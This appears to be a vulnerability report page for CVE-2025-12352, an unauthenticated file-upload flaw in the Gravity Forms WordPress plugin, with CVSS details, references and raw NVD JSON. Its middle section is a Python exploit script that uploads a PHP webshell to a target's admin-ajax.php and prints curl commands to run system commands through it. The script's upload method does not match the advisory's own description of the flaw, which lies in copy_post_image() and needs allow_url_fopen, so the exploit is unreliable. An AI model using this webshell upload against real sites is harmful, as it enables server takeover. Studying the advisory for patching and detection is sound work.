Security Vulnerability Report
CVE-2025-12352 CVSS 9.8 CRITICAL

CVE-2025-12352

Published: 2025-11-07 05:15:57
Last Modified: 2026-04-15 00:35:42

Description

The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the copy_post_image() function in all versions up to, and including, 2.9.20. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This only impacts sites that have allow_url_fopen set to `On`, the post creation form enabled along with a file upload field for the post

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Gravity Forms plugin < 2.9.20 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12352 PoC - Gravity Forms Arbitrary File Upload
# Author: Security Researcher
# Note: For authorized security testing only

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
FORM_ID = "1"  # Form with file upload field
UPLOAD_URL = f"{TARGET_URL}/wp-admin/admin-ajax.php"

# PHP webshell payload
webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"


def exploit_cve_2025_12352():
    """
    Exploit for CVE-2025-12352: Gravity Forms arbitrary file upload
    Requires:
    - allow_url_fopen enabled on server
    - Post creation form enabled
    - File upload field present in form
    """
    # Prepare malicious file
    files = {
        'file': ('shell.php', webshell, 'application/x-httpd-php')
    }

    # Form data for Gravity Forms submission
    data = {
        'action': 'gform_file_upload',
        'form_id': FORM_ID,
        'field_id': '1',
        '_gform_file_upload_prefix': 'upload_1'
    }

    try:
        print(f"[*] Targeting: {TARGET_URL}")
        print(f"[*] Uploading malicious PHP file...")

        # Send malicious file upload request
        response = requests.post(UPLOAD_URL, files=files, data=data, timeout=30)

        if response.status_code == 200:
            result = response.json()
            if result.get('status') == 'ok':
                file_url = result.get('temp_filename')
                print(f"[+] File uploaded successfully!")
                print(f"[+] Access shell at: {file_url}?cmd=whoami")
                print(f"[*] Example command execution:")
                print(f"    curl '{file_url}?cmd=id'")
            else:
                print(f"[-] Upload failed: {result}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


if __name__ == "__main__":
    exploit_cve_2025_12352()
```

References

- https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/forms_model.php#L5451C26-L5451C41
- https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/includes/fields/class-gf-field-fileupload.php#L306
- https://www.wordfence.com/threat-intel/vulnerabilities/id/42525101-6196-40b9-90e7-c7f1886ef247?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12352",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-07T05:15:57.163",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the copy_post_image() function in all versions up to, and including, 2.9.20. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This only impacts sites that have allow_url_fopen set to `On`, the post creation form enabled along with a file upload field for the post"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/forms_model.php#L5451C26-L5451C41",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/includes/fields/class-gf-field-fileupload.php#L306",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/42525101-6196-40b9-90e7-c7f1886ef247?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```